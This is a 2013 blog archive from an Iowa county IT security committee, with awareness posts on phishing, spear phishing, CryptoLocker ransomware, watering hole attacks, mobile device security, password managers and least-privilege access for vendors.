While many associate the holiday season with warm feelings and focus on doing good towards others at this time of year, it is unfortunately a time when the bad guys kick it in to high gear. They know that many people are shopping and looking for bargains, and trying to get all their charitable giving in before the end of the year. It is a perfect time for them to take advantage of us when most of us have our guard down. A tool that is being used more and more by those who want to take advantage of others "good will" at this time of year is cyber attacks.
We have already discussed phishing attacks on this blog in the past, and being cautious in regards to e-mail is warranted all the time, but especially this time of year. A common tactic used in phishing e-mails, and one that has proven to be especially effective is shipping or purchase notification e-mails, chock full of links presumably to track your package or check your order status. Many people order items on-line this time of year, and you may get many perfectly legitimate shipping notification e-mails. The fact that you are expecting a shipping notification e-mail makes this type of attack more effective. You are more likely to click on the links in the message or downloading the attachments without reading the entire message carefully. Don't fall for this trick! Make sure you read the entire e-mail and know how to tell a legitimate shipping notice from a bogus one. The easy and obvious one, did you order the product mentioned in the first place? Hover over links and read the URL that they point to. Does is match the business that sent the notification? On a smart phone, long press on a link to see the actual URL. (Be extra careful here because it can be very easy to accidentally activate the link.) See our article from October 15, 2013 for tips on how to spot a phishing e-mail.
Another thing that can be dangerous this time of year are e-mail and on-line greeting cards. Be very careful with these as well. Do you absolutely know and trust the sender? Perhaps even more importantly, are you confident enough in their tech savvy to be sure they were not duped when they chose a greeting to send? If the answer to either question is no, it is probably best to delete these greetings unopened. Many have dangerous payloads that aren't worth the risk.
It is kind of sad, but unfortunately necessary, that we have to send you these reminders at this time of year. But letting your guard down now can ruin what for many is an enjoyable season.
Monday, December 23, 2013
Monday, October 28, 2013
Mobile Device Security
Hello
Everyone,
This
week we are going to continue our coverage of “Securing the Human” by
discussing Mobile Device Security.
In today’s
busy lifestyles, each of us seem to be more and more glued to our mobile
devices. With that in mind, we also increase the risk of losing those
devices or having them stolen. If your device is lost or stolen, are you
prepared to protect the contents of your device and to ensure that the data
that resides on them is not compromised?
One of
the most effective ways you can protect your information is to secure your
device while you still have it. A great place to start is by enabling
some type of Access Protection, such as setting a PIN, Password or Pattern Lock
that is required to unlock your device before anything can be accessed. This
helps ensure that only authorized users can use and access the information on
your device.
To
establish these settings:
- On an Android Device, it can be setup by going to SETTINGS > LOCATION & SECURITY > SCREEN LOCK
- On an iPhone or iPad, access protection can be setup by going to: SETTINGS > GENERAL > SET SCREEN LOCK
- Once you have set your PIN, Password or Pattern Lock, you will also want to make sure to change the Auto-Lock settings from “None” to a specific amount of time so that the screen automatically locks after a specified time
Another
security feature you can enable is Remote Data Wipe. This allows you to
wipe the device remotely if it is lost or stolen. This can be done on the
device itself to wipe the device after 10 failed passcode attempts, or you can
utilize apps, such as the iPhone / iPad app “Find My Phone” or Android
apps such as “SeekDroid”, “AdroidLost” and “Cerberus”, which will allow you to
access the device remotely from a PC to wipe the device and also allow you to
possibly locate your device if it is still powered on. Check with your IT Department as well, as they may already have processes such as these
in place through corporate policy.
***REMINDER:
More tips on Securing the Human will be given by this year’s fall school
keynote speaker, Lance
Spitzner. You won’t want to miss his eye-opening and thought provoking
presentation.
Also,
don’t miss ICIT being featured in an international webcast given by SANS on
Tuesday, October 29th at 4:00 pm EDT. The story of Iowa Counties Paying IT
Forward will be presented. Click here
for more information and to register.
Until
next week, be prepared and protect your mobile devices!
Thank
you!
Gina
Erickson
IT
Director - Des Moines County
513
N. Main Street
Burlington,
IA 52601
Ph:
319.753.8238
Cell:
319.759.7824
E-Mail:
ericksong@dmcounty.com
Tuesday, October 15, 2013
Clicking Away!
Hi Everyone,
I wanted to continue our discussion about ”Securing the Human.” Many times I will
be removing some spyware or virus from a user’s computer, and I always get
the question, “How did that get in there? Don’t we have stuff that takes care of
this?”
That is a great question! Counties spend thousands of dollars on
security hardware and software to keep our systems from being infected. They do
a pretty good job, but no system is perfect and we need to look at shoring up all
the parts of the county systems. One part of the system that we can strengthen
up right away is the human part. (That means you!)
We, the county employee, need to be educated and made aware of how
we can do our part to make sure our data and computer systems are safe. Many
times a virus or piece of spyware can be traced back to a simple click of a
mouse when we aren't really paying attention. What did that screen say that you
just clicked yes on? One example is the ask.com toolbar. I have had people ask
me how in the world did that get there? What happened too my Google? I then take them
through a java update and low and behold there is the screen during the update
asking if you want to install the ask.com toolbar. Usually most people never
see that screen because they click right through it to get the update; never
understanding they just installed an annoying toolbar on their web browser.
Pretty hard to stop that evil virus or spyware if we are the ones letting it in
past all of the systems.
The Stop.Think.Connect website (http://stopthinkconnect.org/) offers a host of good
information on making us all better users of the internet at work and at home.
You can take all of the cyber education you learn at work and apply that to your
home internet use. Everybody wins!
***REMINDER: More tips on securing the human will be given by this
year’s Iowa State Association of Counties Fall School of Instruction keynote speaker, Lance Spitzner. You won’t want to miss his eye-opening and
thought inducing presentation.
Also, don’t miss ICIT being featured in an international webcast
given by SANS on Tuesday, October 29 at 4:00 pm EDT. The story of Iowa Counties "Paying IT Forward" will be presented. Click
here for more information and to register.
Next week I want to focus on Phishing. It is probably the nastiest
and most effective tool that hackers are using to get into county systems, and we need to
spend a little time and focus on educating ourselves on how to dodge this very
nasty bullet.
Thank you,
Joel Rohne
IT/GIS Worth County
641.324.3668
Phishing and Spear Phishing
No doubt you have heard the term "phishing", but perhaps you are not quite clear on what it is. More recently it seems we hear more about "spear phishing". What is the difference? How can you protect yourself?
Wikipedia has a great article on phishing that explains both terms, some of the history of the practice, including how it got its name, and many of the specific techniques used. Like many security related resources however, some of it can get fairly technical, making it difficult for some to understand what it means to them. The story of how the name "phishing" came about is fairly geeky and technical and relates to when the practice first became prevalent on America On Line. Regardless of how the name actually came about, I think it is a good metaphor for describing the practice. When I think of literal fishing, two methods come to mind, the kind of fishing I used to do with my dad, where we would drop a line in the water and hope something came along and took a bite, or the TV documentaries showing commercial fishermen casting these huge nets to pull in a large haul. Both of these images could be used to help explain the practice of phishing. The goal is to catch someone off guard and steal information from them, such as usernames, passwords, financial account information, real money, etc.
The dropping a line and waiting for someone to bite image aptly describes phishing because e-mail (or in some cases a phone call) are used to deliver the bait, and the bad guys are just hoping that someone takes it. A message might indicate that your account is about to expire. Or maybe you need to renew some information to keep receiving some benefits or services. Or perhaps there is something "you just have to see!" When you click the link suggested, instead of taking you to a legitimate web site, it takes you to a site where you enter the sought after information and the bad guys now have it. In many cases, both the e-mail and the web site might look very convincing. In other cases, opening a malicious attachment is the action desired, infecting your computer with mal-ware, which can then be used to gather more information from you or to enable your computer to be used to attack others.
The casting a wide net image also aptly describes phishing because that is generally how the bad guys operate, sending their e-mails to a wide audience, perhaps thousands or even millions of targets. The wider they cast the net, the more likely they are to get numerous victims to take the bait. The problem for the bad guys when it comes to phishing is that the larger the net cast, the harder it is to make the message look appealing. For example, if I receive an e-mail that my account at a bank needs renewed, but I don't bank there, I am not likely to take the bait. Many people who get the message will be a customer of that bank, but not everyone, and the more bogus e-mails someone receives, the more aware they become that they might eventually be a target of a phishing attack. Over time, as awareness increases, phishing can become less effective for some targets. It is still effective, so it keeps happening and there is still a need to alert, but the bad guys have, as they always do, changed their tactics to become more effective.
Spear phishing has become more prevalent in recent years. The difference between spear phishing and regular phishing, is that the spear phishing attacks are much more targeted. In literal spear fishing, you have to get up close and personal with your target, taking careful aim and striking at just the right time. Spear phishing is like that. The bad guys take the time to get to know their targets, the specific products or services they use, the timing of important events in their life, really as much as they can about them. The target of the attack is also much smaller, a small specific group of persons, or perhaps in some cases even directed at a specific individual, so the messages can be very personal and perhaps very relevant to what may be important to them at the time. The more targeted the bait, the more difficult to spot and the more likely someone will bite. A recent spear phishing attack targeted at executive level state employees has been in the news. A sample subject is "Annual Form - Authorization to Use Privately Owned Vehicle on State Business". Perhaps you can see how someone might be inclined to open the attached form. If their authorization isn't up to date, they may not get reimbursed for their expenses. In this particular attack, the CryptoLocker ransom-ware is the mal-ware embedded in the attached form, which was mentioned in a previous blog post.
So how can you protect yourself from phishing and spear phishing attacks? Learn how to spot the bait. If an e-mail looks suspicious in any way, it is safest to err on the side of caution. Be especially suspicious of e-mails that create a sense of urgency or require immediate action. E-mails with a generic salutation, such as "Dear Customer", are also a red flag. Also watch out for e-mails with a lot of grammar or spelling mistakes. Legitimate businesses will usually proofread their communications carefully prior to sending them. Don't trust links or attachments. From your PC, you can hover your mouse over a link to see the actual target address. If it doesn't match what it displayed, this should raise an alarm. On a mobile device, previewing the link can usually be accomplished by pressing and holding the link, causing a popup to be displayed. Be careful though, it can be easy to accidentally click the link. As for attachments, only open ones that you were expecting is a good, safe practice. Also, don't be quick to trust the sender. Just because an e-mail indicates it is from a trusted friend, it doesn't mean that they actually sent it. The sender address can be forged, their computer may be infected with mal-ware, or their e-mail account could have been compromised (probably because they fell victim to a phishing attack). If you receive an e-mail from a friend that contains links or attachments, contact them by another means to verify they actually sent it.
By using common sense and being generally cautious when using e-mail, you can help protect yourself and others from becoming a victim of a phishing attack.
Wikipedia has a great article on phishing that explains both terms, some of the history of the practice, including how it got its name, and many of the specific techniques used. Like many security related resources however, some of it can get fairly technical, making it difficult for some to understand what it means to them. The story of how the name "phishing" came about is fairly geeky and technical and relates to when the practice first became prevalent on America On Line. Regardless of how the name actually came about, I think it is a good metaphor for describing the practice. When I think of literal fishing, two methods come to mind, the kind of fishing I used to do with my dad, where we would drop a line in the water and hope something came along and took a bite, or the TV documentaries showing commercial fishermen casting these huge nets to pull in a large haul. Both of these images could be used to help explain the practice of phishing. The goal is to catch someone off guard and steal information from them, such as usernames, passwords, financial account information, real money, etc.
The dropping a line and waiting for someone to bite image aptly describes phishing because e-mail (or in some cases a phone call) are used to deliver the bait, and the bad guys are just hoping that someone takes it. A message might indicate that your account is about to expire. Or maybe you need to renew some information to keep receiving some benefits or services. Or perhaps there is something "you just have to see!" When you click the link suggested, instead of taking you to a legitimate web site, it takes you to a site where you enter the sought after information and the bad guys now have it. In many cases, both the e-mail and the web site might look very convincing. In other cases, opening a malicious attachment is the action desired, infecting your computer with mal-ware, which can then be used to gather more information from you or to enable your computer to be used to attack others.
The casting a wide net image also aptly describes phishing because that is generally how the bad guys operate, sending their e-mails to a wide audience, perhaps thousands or even millions of targets. The wider they cast the net, the more likely they are to get numerous victims to take the bait. The problem for the bad guys when it comes to phishing is that the larger the net cast, the harder it is to make the message look appealing. For example, if I receive an e-mail that my account at a bank needs renewed, but I don't bank there, I am not likely to take the bait. Many people who get the message will be a customer of that bank, but not everyone, and the more bogus e-mails someone receives, the more aware they become that they might eventually be a target of a phishing attack. Over time, as awareness increases, phishing can become less effective for some targets. It is still effective, so it keeps happening and there is still a need to alert, but the bad guys have, as they always do, changed their tactics to become more effective.
Spear phishing has become more prevalent in recent years. The difference between spear phishing and regular phishing, is that the spear phishing attacks are much more targeted. In literal spear fishing, you have to get up close and personal with your target, taking careful aim and striking at just the right time. Spear phishing is like that. The bad guys take the time to get to know their targets, the specific products or services they use, the timing of important events in their life, really as much as they can about them. The target of the attack is also much smaller, a small specific group of persons, or perhaps in some cases even directed at a specific individual, so the messages can be very personal and perhaps very relevant to what may be important to them at the time. The more targeted the bait, the more difficult to spot and the more likely someone will bite. A recent spear phishing attack targeted at executive level state employees has been in the news. A sample subject is "Annual Form - Authorization to Use Privately Owned Vehicle on State Business". Perhaps you can see how someone might be inclined to open the attached form. If their authorization isn't up to date, they may not get reimbursed for their expenses. In this particular attack, the CryptoLocker ransom-ware is the mal-ware embedded in the attached form, which was mentioned in a previous blog post.
So how can you protect yourself from phishing and spear phishing attacks? Learn how to spot the bait. If an e-mail looks suspicious in any way, it is safest to err on the side of caution. Be especially suspicious of e-mails that create a sense of urgency or require immediate action. E-mails with a generic salutation, such as "Dear Customer", are also a red flag. Also watch out for e-mails with a lot of grammar or spelling mistakes. Legitimate businesses will usually proofread their communications carefully prior to sending them. Don't trust links or attachments. From your PC, you can hover your mouse over a link to see the actual target address. If it doesn't match what it displayed, this should raise an alarm. On a mobile device, previewing the link can usually be accomplished by pressing and holding the link, causing a popup to be displayed. Be careful though, it can be easy to accidentally click the link. As for attachments, only open ones that you were expecting is a good, safe practice. Also, don't be quick to trust the sender. Just because an e-mail indicates it is from a trusted friend, it doesn't mean that they actually sent it. The sender address can be forged, their computer may be infected with mal-ware, or their e-mail account could have been compromised (probably because they fell victim to a phishing attack). If you receive an e-mail from a friend that contains links or attachments, contact them by another means to verify they actually sent it.
By using common sense and being generally cautious when using e-mail, you can help protect yourself and others from becoming a victim of a phishing attack.
Tuesday, October 1, 2013
We Don't Negotiate with Terrorists
The timing was ironic. Last night I was at the office when the date
changed to October 1, 2013; the beginning of National Cyber Security Awareness
month. The reason I was at the office
was due to a user installing the CryptoLocker ransomware on their machine. This particularly nasty and ingenious piece
of software encrypts all of the Word, Excel, PDF, and image files it can find
on local and network drives. It then
taunts you with the ransom, $300, to get all of your documents decrypted.
The user had opened an innocent looking
email with a zip attachment. Inside that
zip attachment was an executable file designed as a major money maker for these
criminals. It was a spear phishing
attack and it worked.
I first found out about the issue at
around 10:30 p.m. when my phone started buzzing the buzz of numerous emails
arriving. I was shocked when that number
showed 160+ unread emails and it was climbing quickly. The emails were from the antivirus agent installed
on that machine sending out alerts that something malicious was being
blocked. So I logged onto that machine
and saw the CryptoLocker window along with a note that all files are
encrypted. The threat had managed to get
through our email filter and our up to date antivirus agent was helpless to
stop it.
I immediately turned off the
machine and drove in to work to fix whatever damage it had caused. I restored the network files that had been
encrypted, but the local files were unrecoverable. We restored the machine from our image and
the user lost a day’s work. Paying the
$300 was never an option, we don’t negotiate with terrorists.
We have done some phishing attack
training with our users but that didn't stop this attack. I sent out an email to all users late last
night telling them to be alert and think before opening email attachments or
clicking on email links. I included a
link to the July, 2013 OUCH! Newsletter from SANS that talked about spear
phishing. I think the message was heard
loud and clear because it hit close to home.
It was also a good reminder that I need to do a better job protecting
our network. When attacks like this
materialize you go through the steps you could take to prevent it from
happening again in the future.
National Cyber Security month gives
you an excellent platform to push for more security and training for your
users. These threats are real and they
can happen to you.
Monday, September 30, 2013
Why Worry About Watering Holes?
Perhaps you have seen recent news stories about "watering hole" attacks and wondered what they were? More importantly, is it something we in county government have to worry about?
A watering hole attack takes its name from nature, where predator animals, such as lions, rather than chase their prey, simply wait for them to come to them by staking out the watering hole. The prey animal's thirst will eventually force it to seek out water despite the looming danger. In cyber security, the predators will compromise a popular or necessary site used by their targets in order to spread malware, and thereby gain access to their target's computers or information. Although perhaps more difficult than other methods, this form of attack is becoming increasingly popular, especially as security awareness programs make other less difficult attacks, such as phishing, less successful.
Watering hole attacks are absolutely a concern for counties. Because of the wealth of information in possession of counties, much of which is tied directly a persons personal and financial activities, we are target for the bad guys. We have information and they want it. Additionally, many counties use the same vendors, the same state services, the same news and information sources, etc. This commonality makes it easy for a predator to identify resources that a large number of us will eventually seek out.
Perhaps even of bigger concern is that we have web services and resources that many in our communities rely on. If certain types of businesses or organizations become a target, our resources might be viewed as the perfect "watering hole" that would attract that target. This makes diligence on our part essential, to keep our resources secure and/or to make sure that our vendors are doing so.
Similar to phishing attacks, in which case there is little we can do to avoid receiving the phishing e-mails, there is also little we can do to prevent a site that is out of our control from becoming compromised. That is the job of the administrator of that site. The best defense then is education and awareness. Recognizing that a site that we rely on could potentially become compromised and knowing what to watch out for can protect us. Avoid downloading software and plugins that are not absolutely essential. Make sure your anti-malware software is up to date and your operating system is patched. Do links to social media sites and login forms look out of place? Are they the same as the last time you visited? Being alert can keep you safe.
In the case of sites we do have control over, the responsibility is on us and our service providers to keep them safe. Can we avoid requiring any sort of plugin for accessing the needed information? Are links to social media necessary? Content Management Systems (CMS) in particular are a potential source of compromise? If we use a CMS for our site, is the CMS software kept up to date? Is the sites security setup properly so only trusted users can post content? Has it been properly setup to not allow certain types potentially malicious content, such as iframes and javascript? Do we have tools in place to check for mal-ware and unwanted links? Are we monitoring the site regularly?
Humans tend to be trusting, and the bad guys know that. That is why watering hole and phishing attacks work. By being a little less trusting, we can protect ourselves and those that we serve from these sort of attacks.
A watering hole attack takes its name from nature, where predator animals, such as lions, rather than chase their prey, simply wait for them to come to them by staking out the watering hole. The prey animal's thirst will eventually force it to seek out water despite the looming danger. In cyber security, the predators will compromise a popular or necessary site used by their targets in order to spread malware, and thereby gain access to their target's computers or information. Although perhaps more difficult than other methods, this form of attack is becoming increasingly popular, especially as security awareness programs make other less difficult attacks, such as phishing, less successful.
Watering hole attacks are absolutely a concern for counties. Because of the wealth of information in possession of counties, much of which is tied directly a persons personal and financial activities, we are target for the bad guys. We have information and they want it. Additionally, many counties use the same vendors, the same state services, the same news and information sources, etc. This commonality makes it easy for a predator to identify resources that a large number of us will eventually seek out.
Perhaps even of bigger concern is that we have web services and resources that many in our communities rely on. If certain types of businesses or organizations become a target, our resources might be viewed as the perfect "watering hole" that would attract that target. This makes diligence on our part essential, to keep our resources secure and/or to make sure that our vendors are doing so.
Similar to phishing attacks, in which case there is little we can do to avoid receiving the phishing e-mails, there is also little we can do to prevent a site that is out of our control from becoming compromised. That is the job of the administrator of that site. The best defense then is education and awareness. Recognizing that a site that we rely on could potentially become compromised and knowing what to watch out for can protect us. Avoid downloading software and plugins that are not absolutely essential. Make sure your anti-malware software is up to date and your operating system is patched. Do links to social media sites and login forms look out of place? Are they the same as the last time you visited? Being alert can keep you safe.
In the case of sites we do have control over, the responsibility is on us and our service providers to keep them safe. Can we avoid requiring any sort of plugin for accessing the needed information? Are links to social media necessary? Content Management Systems (CMS) in particular are a potential source of compromise? If we use a CMS for our site, is the CMS software kept up to date? Is the sites security setup properly so only trusted users can post content? Has it been properly setup to not allow certain types potentially malicious content, such as iframes and javascript? Do we have tools in place to check for mal-ware and unwanted links? Are we monitoring the site regularly?
Humans tend to be trusting, and the bad guys know that. That is why watering hole and phishing attacks work. By being a little less trusting, we can protect ourselves and those that we serve from these sort of attacks.
Monday, September 16, 2013
Too Many Passwords!
As a county employee you probably have numerous applications and services you use that require passwords. It seems every state agency that you interact with has at least one web site you need to login to. Some have several. Many of the various affiliates of ISAC have their own web projects, such as the ICIT GIS Data Repository or IowaLandRecords. Many of our vendors offer web sites or services we need to use on a regular basis. And then there are the numerous applications we use each and every day within our own county.
With so many applications and services, it is probably not possible for the average person to remember a unique password for each and every one of them. A common practice that many use to deal with this password overload is to reuse the same password for everything. This might seem like a reasonable approach. It sure beats writing them down and risk someone finding them, right? Wrong! Password reuse is incredibly dangerous. There have been countless reports in recent years of security breaches involving leaked passwords. If your password is leaked or shared for one service, and you use the same password for other services, the risk is very high that all of your accounts can be compromised.
A better approach is to use a password manager to keep track of all your passwords. Password managers allow you to store all of your passwords, and other sensitive information, in an encrypted file or database. You then access them with a master password that you can remember. Ideally your password manager is accessible all the time, so an application that you can run on your smart phone is a good option. Another option is a web based password manager, but remember that this is sensitive information, so it is vital to pick a provider you can trust.
The product that I use for my personal password manager is KeePass Password Safe. This is an open source product, so it is free to use, and the source code is open to inspection, so you can have confidence in the encryption implementation. I use an Android smart phone, so I use KeePassDroid to have anywhere access to my passwords. For iPhone users, there is MiniKeePass.
For organizational use, there are some limitations to KeePass, so we use a product called PasswordState to manage passwords at the county. This is a commercial product, and we pay per user, but since many of the passwords we use need to be shared among employees and/or survive employee turnover, this is a great tool for secure, centralized password management. It is a web based product, so it is also accessible from a smart phone, although the user interface is clearly not designed for touch or small screens.
Of course these are just a couple of products that are available for password management. Perhaps you have a favorite already. Regardless, passwords aren't going away anytime soon, so effective password management is an important step in keeping your accounts secure. So get a good password manager and start using it!
Tuesday, September 10, 2013
Who, Me?
In the past two weeks I've done three different security seminars with three different organizations and their security staff. The one trend that continues to surprise me, and was confirmed at all three events, is that most employees still do not realize they are a target. I continue to be surprised as this, as I thought with all the media attention, both in peoples' lives and at work, they would realize they have value, bad guys are after them. Based on what I'm seeing that is not the case.
That does not bode well when securing the human element. To change peoples' behaviors we need to engage them, and we will never achieve that first step until they realize they are a target. If you are looking to secure your employees, contractors and staff, the first question you have to answer is do they even realize they are a target? If not, then do not even bother trying to teach them how to secure themselves. Instead explain to them who is targeting them, how and why. Once you have their attention, then you can begin changing behaviors.
Lance Spitzner is the training director for SANS Securing The Human. To learn more about human security, visit http://www.securingthehuman.org/resources.
That does not bode well when securing the human element. To change peoples' behaviors we need to engage them, and we will never achieve that first step until they realize they are a target. If you are looking to secure your employees, contractors and staff, the first question you have to answer is do they even realize they are a target? If not, then do not even bother trying to teach them how to secure themselves. Instead explain to them who is targeting them, how and why. Once you have their attention, then you can begin changing behaviors.
Lance Spitzner is the training director for SANS Securing The Human. To learn more about human security, visit http://www.securingthehuman.org/resources.
Monday, September 9, 2013
The NSA, Internet Encryption, and What It Means for Iowa Counties
No doubt you have seen the recent news regarding the NSA "cracking" internet encryption techniques. Encryption is a fundamental tool for ensuring privacy and security of numerous internet transactions, including financial data and privacy mandates which effect counties, such as HIPAA and CJIS. Many of the news stories, especially those targeted toward a non-technical audience tend to exaggerate the implications. Others tend to focus on the NSA and what this latest leak reveals about their practices. I don't want to add to either of those conversations. I do think however there are some lessons, none of them necessarily new, that we can learn from.
First off, I would like to mention that one of the best analysis that I have seen in regards to what the NSA is able to do was written by Johannes Ullrich and published on the Internet Storm Center's diary this morning. In believe his entry entitled SSL is broken. So what? adequately summarizes the real nature of what occurred and what the appropriate technical response should be.
Despite all the attention that it is receiving, the fact of the matter appears to be that the NSA isn't actually cracking the encryption, they just have a way to get around much of it. The fact that the NSA has a way around encryption probably does mean that eventually others will too. The good news in my opinion is that now that this vulnerability has been exposed, there will no doubt be efforts to address it. Hopefully the necessary changes to fix the issue can be made before the ways to actually exploit the various backdoors are leaked.
Ultimately however, this capability of the NSA doesn't really change anything. Encryption is still import for securing internet transactions, and most of the bad guys don't have the resources to break the encryption. As Dr. Ullrich mentioned in his article, in many cases vulnerabilities in client software, or social engineering techniques resulted in data leaks, not failures in the encryption infrastructure. It is much easier for hackers to get what they want through insecure human behaviour.
One of these insecure human behaviours is running out of date software. I can't even count the number of times over the years that I have had to install new software on servers specifically to address issues with the SSL implementation. New notices regarding adjustments to how systems are setup, encryption key lengths, etc. are released all the time. It is of vital importance to stay on top of these, not to ignore them. In many cases Iowa counties rely on a vendor for these services. When is the last time you checked on how they are doing in this regard? Do you have tools in place to check for vulnerabilities in your systems where possible? Just making sure you keep the systems you are responsible for up to date can go a long way in keeping your private communications private.
Another insecure human behaviour is just how easily we can be manipulated by clever people. The bad guys exploit this all the time. It is usually much easier to just bypass the technology than trying to break it. That is essentially what the NSA has done. They have convinced others, whether it be encryption software developers or service providers, to give them the keys to their kingdom. Hackers try to do the same thing to us, through phishing e-mails or compromised web sites we visit. The best way to combat this is through education. By increasing awareness of how these devices work, how to spot them, and what to do when we fall prey, we can better protect ourselves, our organizations, and the internet transactions we depend on.
Like most organizations, counties certainly fall into the category of having "limited time and limited resources to fight unlimited worries." By focusing on the things we have control over and not getting distracted by the latest sensational headline, we can continue to make our counties more secure.
Despite all the attention that it is receiving, the fact of the matter appears to be that the NSA isn't actually cracking the encryption, they just have a way to get around much of it. The fact that the NSA has a way around encryption probably does mean that eventually others will too. The good news in my opinion is that now that this vulnerability has been exposed, there will no doubt be efforts to address it. Hopefully the necessary changes to fix the issue can be made before the ways to actually exploit the various backdoors are leaked.
Ultimately however, this capability of the NSA doesn't really change anything. Encryption is still import for securing internet transactions, and most of the bad guys don't have the resources to break the encryption. As Dr. Ullrich mentioned in his article, in many cases vulnerabilities in client software, or social engineering techniques resulted in data leaks, not failures in the encryption infrastructure. It is much easier for hackers to get what they want through insecure human behaviour.
One of these insecure human behaviours is running out of date software. I can't even count the number of times over the years that I have had to install new software on servers specifically to address issues with the SSL implementation. New notices regarding adjustments to how systems are setup, encryption key lengths, etc. are released all the time. It is of vital importance to stay on top of these, not to ignore them. In many cases Iowa counties rely on a vendor for these services. When is the last time you checked on how they are doing in this regard? Do you have tools in place to check for vulnerabilities in your systems where possible? Just making sure you keep the systems you are responsible for up to date can go a long way in keeping your private communications private.
Another insecure human behaviour is just how easily we can be manipulated by clever people. The bad guys exploit this all the time. It is usually much easier to just bypass the technology than trying to break it. That is essentially what the NSA has done. They have convinced others, whether it be encryption software developers or service providers, to give them the keys to their kingdom. Hackers try to do the same thing to us, through phishing e-mails or compromised web sites we visit. The best way to combat this is through education. By increasing awareness of how these devices work, how to spot them, and what to do when we fall prey, we can better protect ourselves, our organizations, and the internet transactions we depend on.
Like most organizations, counties certainly fall into the category of having "limited time and limited resources to fight unlimited worries." By focusing on the things we have control over and not getting distracted by the latest sensational headline, we can continue to make our counties more secure.
Sunday, September 8, 2013
The Importance of the Least Privilege Principal
One of the things we were reminded of last week during the SANS presentation was just how bad humans are at estimating risk. I think the assumption that many people have is that those of us who work in IT should be better at it. Unfortunately, it seems that many in the IT field tend to sacrifice good principles in favor of expedience or efficiency, and in doing so increase the risk to an organizations computer systems. A recent e-mail conversation regarding the practices of some our vendors who provide software and services proves this point.
The discussion surrounded whether or not a certain vendor should have sysadmin level access to the county's database servers. The vendor argued that they could not adequately provide support without this access, and that some of their processes required this level of access. The problem with this is that it violates the security principle of "Least Privilege", which mandates that a person or process must be able to access only the information and resources that are necessary for its legitimate purpose.
We know the vendor understands this principle, because it is a part of their software and the practices they recommend, which includes a separation of duties, access control lists to specific functionality and records within their software, and audit logs to track who did what. The problem is, that when this principle starts to make it more difficult for them, and especially when it is outside their own systems, they no longer care about it. It is expedient to just set access to "wide open" by granting them or one or more of their accounts the "sysadmin" role in the database server. But should that resource or account be compromised, it exposes not just their systems, but the entire database server to risk.
While the original conversation focused on one specific vendor, I am not mentioning them by name because so many of our vendors are guilty of it. What makes matters worse is that many of these vendors use the same credentials in one county after another, so if one organization is compromised, all of their other customers may be easily compromised as well. This demonstrates the importance of another reminder we were given during the SANS presentation last week, which was the dangers of reusing passwords.
I believe in this day and age it is vital that we hold our software vendors to the highest standards. They should be endeavoring to adhere to best practices when it comes to security, such as the "Least Privilege" principal, and when they do not, we should demand that they change. In order for this to work though, it will take more than just the IT people demanding that these practices be changed. For starters, there are still many counties that do not have in-house IT people. Additionally many of the vendors tend to place more weight on the opinions of the policy makers and those who hold the purse strings than they do the IT staff.
No matter what our position is with the county, whether it is IT, an elected or appointed official, an employee or even a citizen, whenever we have a chance to interact with one of our vendors, we should reinforce the importance of adhering to best practices when designing, implementing and supporting the software and services they provide.
For more information on best practices when it comes information security, our friends at SANS provide a wealth of free information.
The discussion surrounded whether or not a certain vendor should have sysadmin level access to the county's database servers. The vendor argued that they could not adequately provide support without this access, and that some of their processes required this level of access. The problem with this is that it violates the security principle of "Least Privilege", which mandates that a person or process must be able to access only the information and resources that are necessary for its legitimate purpose.
We know the vendor understands this principle, because it is a part of their software and the practices they recommend, which includes a separation of duties, access control lists to specific functionality and records within their software, and audit logs to track who did what. The problem is, that when this principle starts to make it more difficult for them, and especially when it is outside their own systems, they no longer care about it. It is expedient to just set access to "wide open" by granting them or one or more of their accounts the "sysadmin" role in the database server. But should that resource or account be compromised, it exposes not just their systems, but the entire database server to risk.
While the original conversation focused on one specific vendor, I am not mentioning them by name because so many of our vendors are guilty of it. What makes matters worse is that many of these vendors use the same credentials in one county after another, so if one organization is compromised, all of their other customers may be easily compromised as well. This demonstrates the importance of another reminder we were given during the SANS presentation last week, which was the dangers of reusing passwords.
I believe in this day and age it is vital that we hold our software vendors to the highest standards. They should be endeavoring to adhere to best practices when it comes to security, such as the "Least Privilege" principal, and when they do not, we should demand that they change. In order for this to work though, it will take more than just the IT people demanding that these practices be changed. For starters, there are still many counties that do not have in-house IT people. Additionally many of the vendors tend to place more weight on the opinions of the policy makers and those who hold the purse strings than they do the IT staff.
No matter what our position is with the county, whether it is IT, an elected or appointed official, an employee or even a citizen, whenever we have a chance to interact with one of our vendors, we should reinforce the importance of adhering to best practices when designing, implementing and supporting the software and services they provide.
For more information on best practices when it comes information security, our friends at SANS provide a wealth of free information.
Saturday, September 7, 2013
Resurrection of ICIT Security Committee
On Friday, September 6th, 2013, to show their support of ICIT, especially our county technology assessment program, representatives from the SANS Institute's Securing the Human presented information on "Next Generation Security Awareness Programs" and "Phishing and Measuring Impact". The presentations were part of the program at ICIT's first Tech Team Workshop, an event designed to refine and formalize the technology assessment program for Iowa Counties that ICIT began in November 2011. To date ICIT has performed assessments for ten of Iowa's counties.
Both informative and energizing, Lance Spitzner's presentations provided timely reminders of why Security Awareness is so important and should be a priority for counties. As a result of the presentations and the discussion among ICIT members that followed, I have decided to create this blog, which will be open for posting by other ICIT Security Committee members as well. The focus of this blog will be to provide information regarding Cyber Security that is relevant to Iowa Counties.
A big Thank You! to SANS for their support and for resurrecting our security committee, which has been floundering for some time. We hope you enjoy our blog!
Both informative and energizing, Lance Spitzner's presentations provided timely reminders of why Security Awareness is so important and should be a priority for counties. As a result of the presentations and the discussion among ICIT members that followed, I have decided to create this blog, which will be open for posting by other ICIT Security Committee members as well. The focus of this blog will be to provide information regarding Cyber Security that is relevant to Iowa Counties.
A big Thank You! to SANS for their support and for resurrecting our security committee, which has been floundering for some time. We hope you enjoy our blog!
Subscribe to:
Posts (Atom)